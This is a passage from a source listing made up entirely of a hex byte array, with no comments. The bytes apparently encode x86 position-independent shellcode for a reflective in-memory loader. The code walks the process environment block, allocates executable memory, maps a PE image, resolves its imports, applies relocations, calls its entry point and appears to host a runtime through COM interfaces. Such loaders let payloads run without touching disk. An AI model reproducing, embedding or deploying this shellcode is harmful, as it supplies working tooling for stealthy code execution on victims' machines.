367 | 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14, | |
368 | 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e, | |
369 | 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74, | |
370 | 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01, | |
371 | 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b, | |
372 | 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, | |
373 | 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33, | |
374 | 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00, | |
375 | 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00, | |
376 | 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33, | |
377 | 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08, | |
378 | 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, | |
379 | 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, | |
380 | 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84, | |
381 | 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, | |
382 | 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a, | |
383 | 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00, | |
384 | 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50, | |
385 | 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, | |
386 | 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00, | |
387 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84, | |
388 | 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44, | |
389 | 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40, | |
390 | 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, | |
391 | 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, | |
392 | 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff, | |
393 | 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22, | |
394 | 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86, | |
395 | 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c, | |
396 | 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86, | |
397 | 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c, | |
398 | 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84, | |
399 | 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52, | |
400 | 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85, | |
401 | 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00, | |
402 | 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff, | |
403 | 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80, | |
404 | 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76, | |
405 | 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03, | |
406 | 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58, | |
407 | 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84, | |
408 | 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8, | |
409 | 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84, | |
410 | 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, | |
411 | 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78, | |
412 | 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83, | |
413 | 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00, | |
414 | 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b, | |
415 | 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85, | |
416 | 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb, | |
417 | 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53, | |
418 | 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, | |
419 | 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01, | |
420 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53, | |
421 | 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c, | |
422 | 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05, | |
423 | 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89, | |
424 | 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00, | |
425 | 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0, | |
426 | 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85, | |
427 | 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44, | |
428 | 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24, | |
429 | 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81, | |
430 | 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, | |
431 | 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0, | |
432 | 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24, | |
433 | 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24, | |
434 | 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24, | |
435 | 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48, | |
436 | 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24, | |
437 | 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, | |
438 | 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01, | |
439 | 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d, | |
440 | 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d, | |
441 | 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c, | |
442 | 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7, | |
443 | 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84, | |
444 | 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24, | |
445 | 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4, | |
446 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00, | |
447 | 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00, | |
448 | 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00, | |
449 | 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
450 | 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, | |
451 | 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, | |
452 | 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20, | |
453 | 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7, | |
454 | 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84, | |
455 | 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24, | |
456 | 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14, | |
457 | 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19, | |
458 | 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24, | |
459 | 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66, | |
460 | 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, | |
461 | 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40, | |
462 | 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89, | |
463 | 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55, | |
464 | 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f, | |
465 | 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3, | |
466 | 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03, | |
467 | 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8, | |
468 | 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c, | |
469 | 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89, | |
470 | 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00, | |
471 | 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c, | |
472 | 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50, | |
473 | 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6, | |
474 | 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10, | |
475 | 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa, | |
476 | 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05, | |
477 | 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83, | |
478 | 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, | |
479 | 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b, | |
480 | 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75, | |
481 | 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b, | |
482 | 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c, | |
483 | 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01, | |
484 | 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66, | |
485 | 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, | |
486 | 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c, | |
487 | 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b, | |
488 | 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b, | |
489 | 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43, | |
490 | 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83, | |
491 | 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18, | |
492 | 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04, | |
493 | 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, | |
494 | 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b, | |
495 | 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b, | |
496 | 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31, | |
497 | 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24, | |
498 | 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b, | |
499 | 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59, | |
500 | 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89, | |
501 | 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00, | |
502 | 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20, | |
503 | 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81, | |
504 | 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00, | |
505 | 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50, | |
506 | 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00, | |
507 | 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00, | |
508 | 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08, | |
509 | 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00, | |
510 | 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4, | |
511 | 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb, | |
512 | 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03, | |
513 | 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0, | |
514 | 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40, | |
515 | 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81, | |
516 | 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00, | |
517 | 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, | |
518 | 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40, | |
519 | 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, | |
520 | 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c, | |
521 | 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e, | |
522 | 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e, | |
523 | 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44, | |
524 | 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53, | |
525 | 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24, | |
526 | 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff, | |
527 | 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8, | |
528 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d, | |
529 | 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a, | |
530 | 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac, | |
531 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b, | |
532 | 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04, | |
533 | 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77, | |
534 | 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0, | |
535 | 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c, | |
536 | 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, | |
537 | 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, | |
538 | 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, | |
539 | 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6, | |
540 | 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57, | |
541 | 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75, | |
542 | 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51, | |
543 | 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, | |
544 | 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, | |
545 | 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00, | |
546 | 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8, | |
547 | 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, | |
548 | 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8, | |
549 | 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74, | |
550 | 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe, | |
551 | 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07, | |
552 | 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, | |
553 | 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b, | |
554 | 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10, | |
555 | 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18, | |
556 | 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff, | |
557 | 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00, | |
558 | 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00, | |
559 | 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff, | |
560 | 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24, | |
561 | 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91, | |
562 | 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24, | |
563 | 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, | |
564 | 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, | |
565 | 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, | |
566 | 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00, | |
567 | 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, | |
568 | 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96, | |
569 | 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04, | |
570 | 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00, | |
571 | 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff, | |
572 | 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44, | |
573 | 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, | |
574 | 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, | |
575 | 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00, | |
576 | 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30, | |
577 | 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, | |
578 | 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, | |
579 | 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c, | |
580 | 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, | |
581 | 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44, | |
582 | 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74, | |
